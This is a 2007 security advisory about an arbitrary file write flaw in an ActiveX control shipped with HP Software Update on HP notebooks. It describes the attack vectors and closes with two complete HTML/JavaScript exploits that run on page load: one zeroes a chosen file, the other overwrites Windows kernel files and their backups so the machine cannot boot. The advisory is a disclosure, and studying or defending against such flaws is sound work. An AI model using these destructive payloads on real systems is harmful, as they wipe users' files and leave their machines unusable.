hp-activex.txt
Posted on 20 December 2007
Advisory: ///////// There is another remotely exploitable flaw within software preinstalled in HP notebook machines. This time, the culprit is automatic software update tool provided by the vendor.The Potential exploitation may lead to user files loss or altering vital system files (e.g. kernel), thus leaving PC unbootable. Overview: ///////// The flaw is located in the software called HP Software Update shipped with the HP notebooks to support automatic software updates and critical vulnerability patching. One of the ActiveX controls deployed by default by the vendor contains an insecure method giving a potential attacker the remote system arbitrary file write access. Impact: /////// Remote user files contents corruption Remote system kernel files damage / Operating System DoS condition Attack vectors: /////////////// There are two main attack vector schemes: - inducing remote user to launch WWW link after obtaining the information about the location of an arbitrary file(s) locations/names in the remote system. After clicking the link the files contents will be unrecoverably destroyed. This attack vector thus requires additional social engineering of the vitim to acquire exact name and location of the potential attack target files. - inducing remote user to launch WWW link resulting in corruption of vital Operating System files, leaving the system unusable. This attack vector DOESN'T require any additional victim social engineering, because the system files are always placed in the predictable locations. Technical details: ////////////////// The vulnerable ActiveX control EngineRules.dll is a component of HP Software Updates system designed by the vendor. It has assigned CLSID: 7CB9D4F5-C492-42A4-93B1-3F7D6946470D and is by default included to "Safe for Scripting" OLE components, that allows full execution scripting access to the control methods from within the browser. The default control installation path is C:Program FilesHewlett-PackardeSupportDiagsRulesEngine.dll The control is used by the the HP Software Updates software's HPWUCli.exe client application to enumerate, load and store available software patches information. The HPWUCli.exe binary is located in the directory: C:Program FilesHPHP Software Update\n The control may also be used by a remote WWW service, such as Hewlett-Packard online software update service. The potentialy insecure method is: void SaveToFile(String dataFilePath); This method is used to store the software patch specific data (version, remote location, vendor name, software description) in the binary file beginning with the 32bit integer value containing the actual patches count stored in the data file. The problem lies in the lack of distinguish between local and global data file area in this control. Both LoadDataFromFile() method and SaveDataToFile() method have an access to the entire file system data area, therefore any arbitrary user file can be accessed remotely using one of these methods by a remote entity. Use the SaveDataToFile() can be exploited to store the empty-by-initialize software patch data in the existing file, which will result in previous file contents loss and resetting it to 4 zero-bytes, describing a zero-size patch. Noticing a specific vulnerability location (vendor's software update system), simple disabling of the vulnerable control by the vendor's patch (like in the other HP software vulnerbility case - HPInfo) would result in the machine software update system compromise in this case and would leave the user vulnerable to the future security issues. Therefore reimplemetation of the update system and/or vulnerable control local data area implementation is strongly recommended. Remote Kernel Wreckage Exploit ////////////////////////////// Using this flaw one can construct an armed exploit, able for example to destroy remote system kernel files and make the remote machine UNBOOTABLE. The exploit is using vulnerable SaveToFile() to overwrite the NT System kernel files with the 4 zero bytes. The target are memory mapped ntoskrnl.exe and ntkrnlpa.exe kernel files which don't have a write lock set on them and may be opened for write. Although Windows NT system contains a protection for this kind of activity (system files overwrite) it can be fooled by overwriting simultanously: system binary files backup directory (System32DllCache) actual system kernel files (System32) and the Driver Backup directory (WindowsDriver Cache) kernel files. After the execution it will store an zero-initialized patch information using SaveToFile() method sequentially to ntoskrnl.exe, ntkrnlpa.exe, ntkrnlmp.exe ,ntkrpamp.exe NT kernel files , first in the System32DllCache directory, second to System32 directory and finally to WindowsDriver Cache dir. After the very next OS shutdown, machine will not be bootable anymore. The exploit code has been attached to the end of this advisory. NOTE however that it is provided ONLY as a Proof of Concept code and has been released ONLY to estimate the impact level of the issue. Vulnerable Software: //////////////////// HP Software Update client v3.0.8.4 RulesEngine.dll ActiveX CTL v1.0 Internet Explorer 6.0 Internet Explorer 7.0 Windows XP Home Windows XP Pro Windows 2000 Windows 2003 Windows Vista Vulnerable Hardware /////////////////// Every HP notebook machine containing the HP Software Updates application is vulnerable. It is possible that the vulnerable machine model list disclosed by the vendor as a confirmation to the previous issue concerning HP laptops - "HP Info Center" case, will be similar in this case. Exploits: ///////// ////////////////////////////////////////// //Remote Arbitrary File Corruption Exploit ////////////////////////////////////////// <html> <head> <script language="JavaScript"> var filePath="c:\temp\testfile.txt"; function spawn3() { o2obj.SaveToFile(filePath); } </script> </head> <body onload="spawn3()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D" </object> </body> </html> //////////////////////////////// //Remote Kernel Wreckage Exploit //////////////////////////////// // // // WARNING! THE REAL THING... // DON'T TRY THIS AT HOME! // THIS WILL DAMAGE YOUR // HP COMPUTER SYSTEM!!! // // //////////////////////////////// <html> <head> <script language="JavaScript"> function spawn3() { o2obj.EvaluateRules(); o2obj.SaveToFile("c:\WINDOWS\system32\dllcache\ntoskrnl.exe"); o2obj.SaveToFile("c:\WINDOWS\system32\dllcache\ntkrnlpa.exe"); o2obj.SaveToFile("c:\WINDOWS\system32\dllcache\ntkrnlmp.exe"); o2obj.SaveToFile("c:\WINDOWS\system32\dllcache\ntkrpamp.exe"); o2obj.SaveToFile("c:\WINDOWS\system32\ntoskrnl.exe"); o2obj.SaveToFile("c:\WINDOWS\system32\ntkrnlpa.exe"); o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\ntoskrnl.exe"); o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\ntkrnlpa.exe"); o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\ntkrnlmp.exe"); o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\ntkrpamp.exe"); o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\sp2.cab"); o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\driver.cab"); } function meltdown() { spawn3(); spawn3(); spawn3(); } </script> </head> <body onload="meltdown()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D" </object> </body> </html> Related final word: /////////////////// Spiderpig, spiderpig, does whatever the spiderpig does... ;-) Links: ////// Original advisory link: www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt Credits: //////// Issue discovery and research: porkythepig Contact: porkythepig@anspi.pl